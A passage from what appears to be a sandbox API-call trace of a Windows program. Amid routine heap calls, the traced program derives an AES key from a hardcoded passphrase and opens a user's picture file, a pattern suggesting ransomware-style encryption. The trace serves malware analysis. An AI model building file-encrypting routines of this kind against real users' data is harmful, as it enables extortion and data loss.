hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.834] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.834] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.835] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0090.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0090.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0090.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0090.838] CloseHandle (hObject=0x298) returned 1 [0090.838] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.838] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0090.838] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c96c10, ftCreationTime.dwHighDateTime=0x1d5ec63, ftLastAccessTime.dwLowDateTime=0x4abbb4e0, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x4abbb4e0, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11095, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="XwG8Sj1nv9U.bmp", cAlternateFileName="XWG8SJ~1.BMP")) returned 0x41ac100 [0090.838] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0090.838] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0090.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.839] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0090.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0090.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.879] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0090.879] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.879] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.879] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0090.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.879] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0090.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca688, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.880] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0090.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.880] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.880] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0090.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.881] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0090.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0090.882] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0090.882] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0090.882] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.883] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\xwg8sj1nv9u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0090.883] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.883] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0090.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 